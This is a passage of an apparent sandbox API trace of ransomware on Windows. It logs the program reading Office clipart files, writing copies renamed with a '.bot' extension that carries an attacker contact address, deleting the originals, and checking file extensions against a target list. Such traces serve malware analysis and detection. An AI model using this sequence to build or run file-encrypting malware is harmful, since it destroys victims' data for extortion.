	[0144.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.981] GetLastError () returned 0x0
	[0144.981] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xed4, lpOverlapped=0x0) returned 1
	[0145.049] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xee0, lpOverlapped=0x0) returned 1
	[0145.050] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.050] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.050] SetEndOfFile (hFile=0x25c) returned 1
	[0145.050] CloseHandle (hObject=0x25c) returned 1
	[0145.050] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.050] SetEndOfFile (hFile=0x39c) returned 1
	[0145.052] CloseHandle (hObject=0x39c) returned 1
	[0145.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 1
	[0145.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.053] lstrlenW (lpString=".doc") returned 4
	[0145.053] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.053] lstrlenW (lpString=".docx") returned 5
	[0145.053] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.053] lstrlenW (lpString=".pdf") returned 4
	[0145.053] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.053] lstrlenW (lpString=".xls") returned 4
	[0145.053] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.053] lstrlenW (lpString=".xlsx") returned 5
	[0145.053] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.053] lstrlenW (lpString=".ppt") returned 4
	[0145.053] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.053] lstrlenW (lpString=".zip") returned 4
	[0145.054] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.054] lstrlenW (lpString=".rar") returned 4
	[0145.054] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString=".bz2") returned 4
	[0145.054] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString=".7z") returned 3
	[0145.054] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString=".dbf") returned 4
	[0145.054] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString=".1cd") returned 4
	[0145.054] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString=".jpg") returned 4
	[0145.054] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString=".doc") returned 4
	[0145.054] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString=".docx") returned 5
	[0145.054] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.054] lstrlenW (lpString=".pdf") returned 4
	[0145.054] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString=".xls") returned 4
	[0145.054] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.054] lstrlenW (lpString=".xlsx") returned 5
	[0145.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.054] lstrlenW (lpString=".ppt") returned 4
	[0145.054] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.054] lstrlenW (lpString=".zip") returned 4
	[0145.054] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.054] lstrlenW (lpString=".rar") returned 4
	[0145.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.055] lstrlenW (lpString=".bz2") returned 4
	[0145.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.055] lstrlenW (lpString=".7z") returned 3
	[0145.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.055] lstrlenW (lpString=".dbf") returned 4
	[0145.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.055] lstrlenW (lpString=".1cd") returned 4
	[0145.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63
	[0145.055] lstrlenW (lpString=".jpg") returned 4
	[0145.055] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.055] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.055] lstrlenW (lpString="DD01182_.WMF") returned 12
	[0145.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0145.091] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2996) returned 1
	[0145.091] CloseHandle (hObject=0x39c) returned 1
	[0145.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 0x20
	[0145.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.093] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.093] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.094] GetLastError () returned 0x0
	[0145.094] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xbb4, lpOverlapped=0x0) returned 1
	[0145.102] WriteFile (in: hFile=0x3d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0145.104] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.104] WriteFile (in: hFile=0x3d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.104] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.104] CloseHandle (hObject=0x3d8) returned 1
	[0145.104] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.104] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.106] CloseHandle (hObject=0x3d4) returned 1
	[0145.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.107] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 1
	[0145.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.107] lstrlenW (lpString=".doc") returned 4
	[0145.107] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.107] lstrlenW (lpString=".docx") returned 5
	[0145.107] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.107] lstrlenW (lpString=".pdf") returned 4
	[0145.107] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.107] lstrlenW (lpString=".xls") returned 4
	[0145.107] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.107] lstrlenW (lpString=".xlsx") returned 5
	[0145.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.107] lstrlenW (lpString=".ppt") returned 4
	[0145.107] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.107] lstrlenW (lpString=".zip") returned 4
	[0145.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.108] lstrlenW (lpString=".rar") returned 4
	[0145.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString=".bz2") returned 4
	[0145.108] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString=".7z") returned 3
	[0145.108] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString=".dbf") returned 4
	[0145.108] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString=".1cd") returned 4
	[0145.108] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString=".jpg") returned 4
	[0145.108] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString=".doc") returned 4
	[0145.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString=".docx") returned 5
	[0145.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.108] lstrlenW (lpString=".pdf") returned 4
	[0145.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString=".xls") returned 4
	[0145.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.108] lstrlenW (lpString=".xlsx") returned 5
	[0145.108] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.108] lstrlenW (lpString=".ppt") returned 4
	[0145.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.108] lstrlenW (lpString=".zip") returned 4
	[0145.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.108] lstrlenW (lpString=".rar") returned 4
	[0145.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.109] lstrlenW (lpString=".bz2") returned 4
	[0145.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.109] lstrlenW (lpString=".7z") returned 3
	[0145.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.109] lstrlenW (lpString=".dbf") returned 4
	[0145.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.109] lstrlenW (lpString=".1cd") returned 4
	[0145.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63
	[0145.109] lstrlenW (lpString=".jpg") returned 4
	[0145.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.109] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.109] lstrlenW (lpString="DD01186_.WMF") returned 12
	[0145.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.110] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8564) returned 1
	[0145.110] CloseHandle (hObject=0x3d4) returned 1
	[0145.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 0x20
	[0145.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.110] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.110] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.111] GetLastError () returned 0x0
	[0145.111] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2174, lpOverlapped=0x0) returned 1
	[0145.120] WriteFile (in: hFile=0x3d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2180, lpOverlapped=0x0) returned 1
	[0145.121] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.122] WriteFile (in: hFile=0x3d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.122] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.122] CloseHandle (hObject=0x3d8) returned 1
	[0145.122] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.122] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.124] CloseHandle (hObject=0x3d4) returned 1
	[0145.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 1
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.125] lstrlenW (lpString=".doc") returned 4
	[0145.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString=".docx") returned 5
	[0145.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.125] lstrlenW (lpString=".pdf") returned 4
	[0145.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString=".xls") returned 4
	[0145.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.125] lstrlenW (lpString=".xlsx") returned 5
	[0145.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.125] lstrlenW (lpString=".ppt") returned 4
	[0145.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.125] lstrlenW (lpString=".zip") returned 4
	[0145.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.125] lstrlenW (lpString=".rar") returned 4
	[0145.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString=".bz2") returned 4
	[0145.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString=".7z") returned 3
	[0145.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.125] lstrlenW (lpString=".dbf") returned 4
	[0145.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.125] lstrlenW (lpString=".1cd") returned 4
	[0145.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString=".jpg") returned 4
	[0145.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString=".doc") returned 4
	[0145.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString=".docx") returned 5
	[0145.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.126] lstrlenW (lpString=".pdf") returned 4
	[0145.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString=".xls") returned 4
	[0145.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.126] lstrlenW (lpString=".xlsx") returned 5
	[0145.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.126] lstrlenW (lpString=".ppt") returned 4
	[0145.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString=".zip") returned 4
	[0145.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.126] lstrlenW (lpString=".rar") returned 4
	[0145.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString=".bz2") returned 4
	[0145.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString=".7z") returned 3
	[0145.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString=".dbf") returned 4
	[0145.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.126] lstrlenW (lpString=".1cd") returned 4
	[0145.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63
	[0145.127] lstrlenW (lpString=".jpg") returned 4
	[0145.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.127] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.127] lstrlenW (lpString="DD01434_.WMF") returned 12
	[0145.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.247] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=900) returned 1
	[0145.257] CloseHandle (hObject=0x3c0) returned 1
	[0145.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 0x20
	[0145.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.324] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.324] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
